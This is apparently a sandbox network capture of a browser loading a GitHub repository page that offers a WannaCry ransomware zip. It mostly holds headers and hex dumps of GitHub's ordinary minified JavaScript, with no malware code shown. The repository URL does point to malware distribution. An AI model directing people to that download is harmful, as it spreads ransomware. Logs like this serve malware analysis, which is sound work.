                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 77580
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 13 Dec 2023 17:40:24 GMT
                                                                                      ETag: 0x8DBFC029676217D
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 4613725
                                                                                      X-Served-By: cache-iad-kiad7000173-IAD, cache-ewr18134-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 7552, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 45e76db1ca6f79176cb0e4dd8f227b710481dfd8
                                                                                      2024-03-23 14:47:23 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 22 5d 2c 7b 36 37 38 35 32 3a 28 65 2c 74 2c 73 29 3d 3e 7b 73 2e 64 28 74 2c 7b 45 5f 3a 28 29 3d 3e 6f 2c 4f 59 3a 28 29 3d 3e 44 2c 56 6e 3a 28 29 3d 3e 4f 2c 63 72 3a 28 29 3d 3e 50 61 67 65 52 65 6e 64 65 72 65 72 2c 72 79 3a 28 29 3d 3e 71 2c 73 65 73 73 69 6f 6e 3a 28 29 3d 3e 4d 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js"],{67852:(e,t,s)=>{s.d(t,{E_:()=>o,OY:()=>D,Vn:()=>O,cr:()=>PageRenderer,ry:()=>q,session:()=>M}),function(){if(void 0===
                                                                                      2024-03-23 14:47:23 UTC16384INData Raw: 73 2e 73 63 72 6f 6c 6c 54 6f 45 6c 65 6d 65 6e 74 28 74 29 2c 74 68 69 73 2e 66 6f 63 75 73 45 6c 65 6d 65 6e 74 28 74 29 29 3a 74 68 69 73 2e 73 63 72 6f 6c 6c 54 6f 50 6f 73 69 74 69 6f 6e 28 7b 78 3a 30 2c 79 3a 30 7d 29 7d 73 63 72 6f 6c 6c 54 6f 41 6e 63 68 6f 72 46 72 6f 6d 4c 6f 63 61 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 73 63 72 6f 6c 6c 54 6f 41 6e 63 68 6f 72 28 68 28 65 29 29 7d 73 63 72 6f 6c 6c 54 6f 45 6c 65 6d 65 6e 74 28 65 29 7b 65 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 28 29 7d 66 6f 63 75 73 45 6c 65 6d 65 6e 74 28 65 29 7b 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 28 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 3f 65 2e 66 6f 63 75 73 28 29 3a 28 65 2e 73 65
                                                                                      Data Ascii: s.scrollToElement(t),this.focusElement(t)):this.scrollToPosition({x:0,y:0})}scrollToAnchorFromLocation(e){this.scrollToAnchor(h(e))}scrollToElement(e){e.scrollIntoView()}focusElement(e){e instanceof HTMLElement&&(e.hasAttribute("tabindex")?e.focus():(e.se
                                                                                      2024-03-23 14:47:23 UTC16384INData Raw: 75 65 73 74 26 26 74 68 69 73 2e 72 65 71 75 65 73 74 2e 63 61 6e 63 65 6c 28 29 2c 74 68 69 73 2e 63 61 6e 63 65 6c 52 65 6e 64 65 72 28 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 4b 2e 63 61 6e 63 65 6c 65 64 29 7d 63 6f 6d 70 6c 65 74 65 28 29 7b 74 68 69 73 2e 73 74 61 74 65 21 3d 4b 2e 73 74 61 72 74 65 64 7c 7c 28 74 68 69 73 2e 72 65 63 6f 72 64 54 69 6d 69 6e 67 4d 65 74 72 69 63 28 7a 2e 76 69 73 69 74 45 6e 64 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 4b 2e 63 6f 6d 70 6c 65 74 65 64 2c 74 68 69 73 2e 66 6f 6c 6c 6f 77 52 65 64 69 72 65 63 74 28 29 2c 74 68 69 73 2e 66 6f 6c 6c 6f 77 65 64 52 65 64 69 72 65 63 74 7c 7c 28 74 68 69 73 2e 61 64 61 70 74 65 72 2e 76 69 73 69 74 43 6f 6d 70 6c 65 74 65 64 28 74 68 69 73 29 2c 74 68 69 73 2e 64 65 6c 65 67
                                                                                      Data Ascii: uest&&this.request.cancel(),this.cancelRender(),this.state=K.canceled)}complete(){this.state!=K.started||(this.recordTimingMetric(z.visitEnd),this.state=K.completed,this.followRedirect(),this.followedRedirect||(this.adapter.visitCompleted(this),this.deleg
                                                                                      2024-03-23 14:47:23 UTC16384INData Raw: 65 49 73 43 6f 6e 6e 65 63 74 65 64 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 6f 75 72 63 65 73 2e 68 61 73 28 65 29 7d 61 73 79 6e 63 20 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 52 65 73 70 6f 6e 73 65 28 65 29 7b 6c 65 74 20 74 3d 61 77 61 69 74 20 65 2e 72 65 73 70 6f 6e 73 65 48 54 4d 4c 3b 74 26 26 74 68 69 73 2e 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 48 54 4d 4c 28 74 29 7d 72 65 63 65 69 76 65 4d 65 73 73 61 67 65 48 54 4d 4c 28 65 29 7b 74 68 69 73 2e 64 65 6c 65 67 61 74 65 2e 72 65 63 65 69 76 65 64 4d 65 73 73 61 67 65 46 72 6f 6d 53 74 72 65 61 6d 28 53 74 72 65 61 6d 4d 65 73 73 61 67 65 2e 77 72 61 70 28 65 29 29 7d 7d 3b 6c 65 74 20 45 72 72 6f 72 52 65 6e 64 65 72 65 72 3d 63 6c 61 73 73 20 45 72 72 6f 72 52 65 6e 64 65 72 65
                                                                                      Data Ascii: eIsConnected(e){return this.sources.has(e)}async receiveMessageResponse(e){let t=await e.responseHTML;t&&this.receiveMessageHTML(t)}receiveMessageHTML(e){this.delegate.receivedMessageFromStream(StreamMessage.wrap(e))}};let ErrorRenderer=class ErrorRendere
                                                                                      2024-03-23 14:47:23 UTC12044INData Raw: 63 3d 6e 75 6c 6c 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 73 72 63 3d 65 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6c 6f 61 64 65 64 7d 63 6f 6d 70 6c 65 74 65 43 68 61 6e 67 65 64 28 29 7b 74 68 69 73 2e 69 73 49 67 6e 6f 72 69 6e 67 43 68 61 6e 67 65 73 54 6f 28 22 63 6f 6d 70 6c 65 74 65 22 29 7c 7c 74 68 69 73 2e 6c 6f 61 64 53 6f 75 72 63 65 55 52 4c 28 29 7d 6c 6f 61 64 69 6e 67 53 74 79 6c 65 43 68 61 6e 67 65 64 28 29 7b 74 68 69 73 2e 6c 6f 61 64 69 6e 67 53 74 79 6c 65 3d 3d 55 2e 6c 61 7a 79 3f 74 68 69 73 2e 61 70 70 65 61 72 61 6e 63 65 4f 62 73 65 72 76 65 72 2e 73 74 61 72 74 28 29 3a 28 74 68 69 73 2e 61 70 70 65 61 72 61 6e 63 65 4f 62 73 65 72 76 65 72 2e 73 74 6f 70 28 29 2c 74 68 69 73 2e 6c 6f 61 64 53 6f 75 72 63 65 55 52 4c 28 29
                                                                                      Data Ascii: c=null,this.element.src=e,this.element.loaded}completeChanged(){this.isIgnoringChangesTo("complete")||this.loadSourceURL()}loadingStyleChanged(){this.loadingStyle==U.lazy?this.appearanceObserver.start():(this.appearanceObserver.stop(),this.loadSourceURL()


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.1649700140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC1103OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/security/overall-count HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: text/fragment+html
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no
                                                                                      2024-03-23 14:47:23 UTC458INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Content-Type: text/fragment+html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: max-age=14400, private
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:23 UTC2944INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                      2024-03-23 14:47:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.1649735185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC736OUTGET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_scroll-anchoring_dist_scro-52dc4b-4fecca2d00e4.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 15229
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 06 Feb 2024 08:35:48 GMT
                                                                                      ETag: 0x8DC26EE9E81093F
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 1353042
                                                                                      X-Served-By: cache-iad-kiad7000161-IAD, cache-ewr18179-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 53, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: e67004c3db18a87fbb6a961c854c68b24b54b507
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 66 6f 72 6d 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 63 72 6f 6c 6c 2d 61 6e 63 68 6f 72 69 6e 67 5f 64 69 73 74 5f 73 63 72 6f 2d 35 32 64 63 34 62 22 5d 2c 7b 36 35 39 33 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 72 3b 6e 2e 64 28 74 2c 7b 41 43 3a 28 29 3d 3e 75 2c 72 4b 3a 28 29 3d 3e 6f 2c 75 54 3a 28 29 3d 3e 61 7d 29 3b 6c 65 74 20 45 72 72 6f 72 57 69 74 68 52 65 73 70 6f
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_remote-form_dist_index_js-node_modules_scroll-anchoring_dist_scro-52dc4b"],{65935:(e,t,n)=>{let r;n.d(t,{AC:()=>u,rK:()=>o,uT:()=>a});let ErrorWithRespo
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 73 29 65 28 74 29 7d 29 7d 65 6c 73 65 20 74 2e 73 75 62 6d 69 74 28 29 7d 2c 65 3d 3e 7b 74 2e 73 75 62 6d 69 74 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 68 72 6f 77 20 65 7d 29 7d 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 2c 6e 2c 72 29 7b 6c 65 74 20 73 3d 21 31 3b 66 6f 72 28 6c 65 74 20 6c 20 6f 66 20 65 29 7b 6c 65 74 5b 65 2c 61 5d 3d 69 28 29 2c 6f 3d 28 29 3d 3e 28 73 3d 21 30 2c 61 28 29 2c 72 29 2c 75 3d 7b 74 65 78 74 3a 6f 2c 6a 73 6f 6e 3a 28 29 3d 3e 28 6e 2e 68 65 61 64 65 72 73 2e 73 65 74 28 22 41 63 63 65 70 74 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 29 2c 6f 28 29 29 2c 68 74 6d 6c 3a 28 29 3d 3e 28 6e 2e 68 65 61 64 65 72 73 2e 73 65 74 28 22 41 63 63 65 70 74 22 2c 22 74
                                                                                      Data Ascii: s)e(t)})}else t.submit()},e=>{t.submit(),setTimeout(()=>{throw e})})}async function c(e,t,n,r){let s=!1;for(let l of e){let[e,a]=i(),o=()=>(s=!0,a(),r),u={text:o,json:()=>(n.headers.set("Accept","application/json"),o()),html:()=>(n.headers.set("Accept","t
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 72 20 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6e 3d 65 5b 74 5d 3b 69 66 28 72 2e 63 6f 6e 74 61 69 6e 73 28 6e 2e 65 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 20 6e 7d 7d 28 69 29 3b 69 66 28 74 29 7b 6e 3d 74 2e 65 6c 65 6d 65 6e 74 3b 76 61 72 20 73 3d 74 2e 74 6f 70 2c 6c 3d 74 2e 6c 65 66 74 2c 61 3d 6e 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2c 6f 3d 61 2e 74 6f 70 2c 75 3d 61 2e 6c 65 66 74 3b 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 69 3d 72 2e 64 65 66 61 75 6c 74 56 69 65 77 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 3f 7b 74 6f 70 3a 65 2e 73
                                                                                      Data Ascii: r t=0;t<e.length;t++){var n=e[t];if(r.contains(n.element))return n}}(i);if(t){n=t.element;var s=t.top,l=t.left,a=n.getBoundingClientRect(),o=a.top,u=a.left;!function(e,t,n){var r=e.ownerDocument,i=r.defaultView;function s(e){return e.offsetParent?{top:e.s
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 3d 7b 7d 2c 74 68 69 73 2e 70 61 72 65 6e 74 3d 65 7c 7c 6e 75 6c 6c 7d 67 65 74 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 5b 65 5d 7d 69 6e 73 65 72 74 28 65 29 7b 6c 65 74 20 74 3d 74 68 69 73 3b 66 6f 72 28 6c 65 74 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 3d 31 29 7b 6c 65 74 20 72 3d 65 5b 6e 5d 2c 69 3d 74 2e 67 65 74 28 72 29 3b 69 66 28 6e 3d 3d 3d 65 2e 6c 65 6e 67 74 68 2d 31 29 72 65 74 75 72 6e 20 69 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 61 64 69 78 54 72 69 65 26 26 28 74 2e 64 65 6c 65 74 65 28 69 29 2c 69 3d 6e 75 6c 6c 29 2c 69 7c 7c 28 69 3d 6e 65 77 20 4c 65 61 66 28 74 29 2c 74 2e 63 68 69 6c
                                                                                      Data Ascii: (e){this.parent=null,this.children={},this.parent=e||null}get(e){return this.children[e]}insert(e){let t=this;for(let n=0;n<e.length;n+=1){let r=e[n],i=t.get(r);if(n===e.length-1)return i instanceof RadixTrie&&(t.delete(i),i=null),i||(i=new Leaf(t),t.chil
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 78 63 36 22 3a 27 22 27 2c 22 5c 75 30 33 41 39 22 3a 22 7a 22 2c 22 5c 75 32 32 34 38 22 3a 22 78 22 2c 22 5c 78 65 37 22 3a 22 63 22 2c 22 5c 75 32 32 31 41 22 3a 22 76 22 2c 22 5c 75 32 32 32 42 22 3a 22 62 22 2c 22 5c 78 62 35 22 3a 22 6d 22 2c 22 5c 75 32 32 36 34 22 3a 22 2c 22 2c 22 5c 75 32 32 36 35 22 3a 22 2e 22 2c 22 5c 78 66 37 22 3a 22 2f 22 2c 22 5c 78 62 38 22 3a 22 5a 22 2c 22 5c 75 30 32 44 42 22 3a 22 58 22 2c 22 5c 78 63 37 22 3a 22 43 22 2c 22 5c 75 32 35 43 41 22 3a 22 56 22 2c 22 5c 75 30 31 33 31 22 3a 22 42 22 2c 22 5c 75 30 32 44 43 22 3a 22 4e 22 2c 22 5c 78 63 32 22 3a 22 4d 22 2c 22 5c 78 61 66 22 3a 22 3c 22 2c 22 5c 75 30 32 44 38 22 3a 22 3e 22 2c 22 5c 78 62 66 22 3a 22 3f 22 7d 2c 69 3d 7b 22 60 22 3a 22 7e 22 2c 31 3a 22
                                                                                      Data Ascii: xc6":'"',"\u03A9":"z","\u2248":"x","\xe7":"c","\u221A":"v","\u222B":"b","\xb5":"m","\u2264":",","\u2265":".","\xf7":"/","\xb8":"Z","\u02DB":"X","\xc7":"C","\u25CA":"V","\u0131":"B","\u02DC":"N","\xc2":"M","\xaf":"<","\u02D8":">","\xbf":"?"},i={"`":"~",1:"
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 75 6c 6c 2c 74 68 69 73 2e 6f 6e 52 65 73 65 74 3d 65 7d 67 65 74 20 70 61 74 68 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 70 61 74 68 7d 67 65 74 20 73 65 71 75 65 6e 63 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 70 61 74 68 2e 6a 6f 69 6e 28 22 20 22 29 7d 72 65 67 69 73 74 65 72 4b 65 79 70 72 65 73 73 28 65 29 7b 74 68 69 73 2e 5f 70 61 74 68 3d 5b 2e 2e 2e 74 68 69 73 2e 5f 70 61 74 68 2c 6c 28 65 29 5d 2c 74 68 69 73 2e 73 74 61 72 74 54 69 6d 65 72 28 29 7d 72 65 73 65 74 28 29 7b 76 61 72 20 65 3b 74 68 69 73 2e 6b 69 6c 6c 54 69 6d 65 72 28 29 2c 74 68 69 73 2e 5f 70 61 74 68 3d 5b 5d 2c 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 68 69 73 2e 6f 6e 52 65 73 65 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 65 2e 63 61 6c 6c 28 74 68 69 73 29
                                                                                      Data Ascii: ull,this.onReset=e}get path(){return this._path}get sequence(){return this._path.join(" ")}registerKeypress(e){this._path=[...this._path,l(e)],this.startTimer()}reset(){var e;this.killTimer(),this._path=[],null===(e=this.onReset)||void 0===e||e.call(this)
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 2c 64 65 74 61 69 6c 3a 7b 70 61 74 68 3a 74 7d 7d 29 2c 72 3d 21 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 29 3b 72 7c 7c 28 63 28 65 29 3f 65 2e 66 6f 63 75 73 28 29 3a 65 2e 63 6c 69 63 6b 28 29 29 7d 28 6e 2c 6d 2e 70 61 74 68 29 2c 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 29 2c 6d 2e 72 65 73 65 74 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 74 29 7b 30 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 66 2e 63 68 69 6c 64 72 65 6e 29 2e 6c 65 6e 67 74 68 26 26 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 70 29 3b 6c 65 74 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 5b 5d 2c 6e 3d 5b 22 22 5d 2c 72 3d
                                                                                      Data Ascii: ,{cancelable:!0,detail:{path:t}}),r=!e.dispatchEvent(n);r||(c(e)?e.focus():e.click())}(n,m.path),e.preventDefault()),m.reset()}}function b(e,t){0===Object.keys(f.children).length&&document.addEventListener("keydown",p);let n=function(e){let t=[],n=[""],r=
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6e 74 54 61 72 67 65 74 3b 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 29 7b 69 66 28 21 73 28 69 2e 64 72 61 67 67 69 6e 67 2c 74 29 29 7b 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 72 65 74 75 72 6e 7d 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 2e 64 61 74 61 54 72 61 6e 73 66 65 72 26 26 28 65 2e 64 61 74 61 54 72 61 6e 73 66 65 72 2e 64 72 6f 70 45 66 66 65 63 74 3d 22 6d 6f 76 65 22 29 2c 69 2e 64 72 6f 70 7a 6f 6e 65 21 3d 3d 74 26 26 28 69 2e 64 72 61 67 67 69 6e 67 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 69 73 2d 64 72 61 67 67 69 6e 67 22 29 2c 69 2e 64 72 6f 70 7a 6f 6e 65 3d 74 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3d 3d 3d 74
                                                                                      Data Ascii: ntTarget;if(t instanceof Element){if(!s(i.dragging,t)){e.stopPropagation();return}e.preventDefault(),e.dataTransfer&&(e.dataTransfer.dropEffect="move"),i.dropzone!==t&&(i.dragging.classList.add("is-dragging"),i.dropzone=t,function(e,t){if(e.parentNode===t
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 7b 6c 65 74 20 74 3d 65 2e 74 61 72 67 65 74 3b 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 26 26 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 74 61 73 6b 2d 6c 69 73 74 2d 69 74 65 6d 2d 63 68 65 63 6b 62 6f 78 22 29 26 26 74 68 69 73 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 74 61 73 6b 2d 6c 69 73 74 73 2d 63 68 65 63 6b 22 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 7b 70 6f 73 69 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 6b 28 65 29 3b 69 66 28 21 74 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 2e 63 6f 6e 74 61 69 6e 73 2d 74 61 73 6b 2d 6c 69 73 74 20 6e 6f 74 20 66 6f 75 6e 64 22 29 3b 6c 65
                                                                                      Data Ascii: {let t=e.target;t instanceof HTMLInputElement&&t.classList.contains("task-list-item-checkbox")&&this.dispatchEvent(new CustomEvent("task-lists-check",{bubbles:!0,detail:{position:function(e){let t=k(e);if(!t)throw Error(".contains-task-list not found");le
